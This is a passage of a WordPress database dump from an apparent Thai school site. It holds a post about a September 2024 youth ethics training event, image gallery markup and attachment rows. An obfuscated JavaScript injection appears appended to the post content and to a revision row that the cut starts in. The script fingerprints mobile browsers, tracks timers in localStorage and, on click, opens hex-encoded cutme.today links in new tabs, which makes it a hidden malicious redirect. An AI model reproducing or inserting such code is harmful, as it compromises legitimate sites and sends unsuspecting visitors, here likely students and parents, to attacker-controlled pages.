)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ทดสอบฟอร์ม','','inherit','closed','closed','','1105-revision-v1','','','2024-09-05 20:31:02','2024-09-05 13:31:02','',1105,'http://pakhaeng.ssk.in.th/?p=1106',0,'revision','',0),
(1108,1,'2024-09-06 09:01:02','2024-09-06 02:01:02','<!-- wp:paragraph -->\n<p><strong>วันที่ 4 กันยายน พ.ศ.2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ร่วมกับ องค์การบริหารส่วนตำบลโพธิ์ จัดกิจกรรมโครงการอบรมคุณธรรมจริยธรรมแก่เยาวชน อบต.จาน ประจำปีงบประมาณ 2567 เพื่อปลูกฝังให้นักเรียน มีคุณธรรมจริยธรรม และจิตสำนึกที่ดี และสามารถนําความรู้ที่ได้มาปรับเปลี่ยนทัศนคติ การดําเนินชีวิตเป็นไปอย่าง ถูกต้อง ตามหลักคุณธรรม จริยธรรมของพระพุทธศาสนา โดยได้รับเกียรติจาก นายประเสริฐ ปาโต เป็นประธานในพิธีเปิดโครงการ</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1109,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3923_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1109\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1112,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3924_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1112\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1110,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3925_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1110\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1111,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3926_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1111\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1114,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3927_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1114\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1113,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3928_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1113\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1115,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3929_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1115\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1120,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3930_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1120\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1116,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3931_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1116\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1119,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3932_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1119\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1118,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3933_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1118\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1117,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3934_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1117\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1121,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3935_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1121\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1122,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3936_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1122\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1123,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3937_0-1024x577.jpg\" alt=\"\" class=\"wp-image-1123\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1125,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656581-1024x576.jpg\" alt=\"\" class=\"wp-image-1125\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1124,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656585-1024x578.jpg\" alt=\"\" class=\"wp-image-1124\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1126,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656589_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1126\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1127,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656591_0-1024x578.jpg\" alt=\"\" class=\"wp-image-1127\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1128,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656596_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1128\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1129,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/S__69656598_0-1024x576.jpg\" alt=\"\" class=\"wp-image-1129\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','จัดกิจกรรมโครงการอบรมคุณธรรมจริยธรรมแก่เยาวชน อบต.จาน ประจำปีงบประมาณ 2567','','publish','closed','closed','','%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%ad%e0%b8%9a%e0%b8%a3%e0%b8%a1%e0%b8%84','','','2024-09-06 09:01:04','2024-09-06 02:01:04','',0,'http://pakhaeng.ssk.in.th/?p=1108',0,'post','',0),
(1109,1,'2024-09-06 08:59:27','2024-09-06 01:59:27','','3923_0','','inherit','','closed','','3923_0','','','2024-09-06 08:59:27','2024-09-06 01:59:27','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3923_0.jpg',0,'attachment','image/jpeg',0),
(1110,1,'2024-09-06 08:59:28','2024-09-06 01:59:28','','3925_0','','inherit','','closed','','3925_0','','','2024-09-06 08:59:28','2024-09-06 01:59:28','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3925_0.jpg',0,'attachment','image/jpeg',0),
(1111,1,'2024-09-06 08:59:28','2024-09-06 01:59:28','','3926_0','','inherit','','closed','','3926_0','','','2024-09-06 08:59:28','2024-09-06 01:59:28','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3926_0.jpg',0,'attachment','image/jpeg',0),
(1112,1,'2024-09-06 08:59:28','2024-09-06 01:59:28','','3924_0','','inherit','','closed','','3924_0','','','2024-09-06 08:59:28','2024-09-06 01:59:28','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3924_0.jpg',0,'attachment','image/jpeg',0),
(1113,1,'2024-09-06 08:59:28','2024-09-06 01:59:28','','3928_0','','inherit','','closed','','3928_0','','','2024-09-06 08:59:28','2024-09-06 01:59:28','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3928_0.jpg',0,'attachment','image/jpeg',0),
(1114,1,'2024-09-06 08:59:28','2024-09-06 01:59:28','','3927_0','','inherit','','closed','','3927_0','','','2024-09-06 08:59:28','2024-09-06 01:59:28','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3927_0.jpg',0,'attachment','image/jpeg',0),
(1115,1,'2024-09-06 08:59:33','2024-09-06 01:59:33','','3929_0','','inherit','','closed','','3929_0','','','2024-09-06 08:59:33','2024-09-06 01:59:33','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3929_0.jpg',0,'attachment','image/jpeg',0),
(1116,1,'2024-09-06 08:59:33','2024-09-06 01:59:33','','3931_0','','inherit','','closed','','3931_0','','','2024-09-06 08:59:33','2024-09-06 01:59:33','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3931_0.jpg',0,'attachment','image/jpeg',0),
(1117,1,'2024-09-06 08:59:33','2024-09-06 01:59:33','','3934_0','','inherit','','closed','','3934_0','','','2024-09-06 08:59:33','2024-09-06 01:59:33','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3934_0.jpg',0,'attachment','image/jpeg',0),
(1118,1,'2024-09-06 08:59:33','2024-09-06 01:59:33','','3933_0','','inherit','','closed','','3933_0','','','2024-09-06 08:59:33','2024-09-06 01:59:33','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3933_0.jpg',0,'attachment','image/jpeg',0),
(1119,1,'2024-09-06 08:59:33','2024-09-06 01:59:33','','3932_0','','inherit','','closed','','3932_0','','','2024-09-06 08:59:33','2024-09-06 01:59:33','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3932_0.jpg',0,'attachment','image/jpeg',0),
(1120,1,'2024-09-06 08:59:34','2024-09-06 01:59:34','','3930_0','','inherit','','closed','','3930_0','','','2024-09-06 08:59:34','2024-09-06 01:59:34','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3930_0.jpg',0,'attachment','image/jpeg',0),
(1121,1,'2024-09-06 08:59:38','2024-09-06 01:59:38','','3935_0','','inherit','','closed','','3935_0','','','2024-09-06 08:59:38','2024-09-06 01:59:38','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3935_0.jpg',0,'attachment','image/jpeg',0),
(1122,1,'2024-09-06 08:59:38','2024-09-06 01:59:38','','3936_0','','inherit','','closed','','3936_0','','','2024-09-06 08:59:38','2024-09-06 01:59:38','',1108,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/09/3936_0.jpg',0,'attachment','image/jpeg',0),
